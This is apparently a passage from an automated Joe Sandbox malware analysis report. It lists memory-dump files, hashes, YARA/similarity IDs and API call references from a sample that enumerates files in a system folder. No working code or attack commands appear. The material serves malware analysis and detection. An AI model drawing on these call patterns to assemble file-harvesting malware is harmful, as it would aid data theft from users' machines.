                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                              • Instruction ID: e44d59ee04860fd7b8ef20eaa497dcf880ee81561addbb3592c7221c4490ee5d
                              • Opcode Fuzzy Hash: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                              • Instruction Fuzzy Hash: F0F06D36D052079BDB21BFB85E07F5D37A0AF00724F25414DF418A62D2DB685940FE96
                              APIs
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4F7A
                              • lstrcat.KERNEL32(?,00FD1070), ref: 00FC4F97
                              • lstrcat.KERNEL32(?,00DE8DA8), ref: 00FC4FAB
                              • lstrcat.KERNEL32(?,00FD1074), ref: 00FC4FBD
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                                • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                                • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                                • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                              • Instruction ID: a01b349b13e2008086b99d12f77d1b03e12d7afa07ba86e3118ab4a7ac174515
                              • Opcode Fuzzy Hash: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                              • Instruction Fuzzy Hash: C521A47690020867C768FBA0EC46FE9333CAB54700F00455CB65D97185EEBCAAC99BA2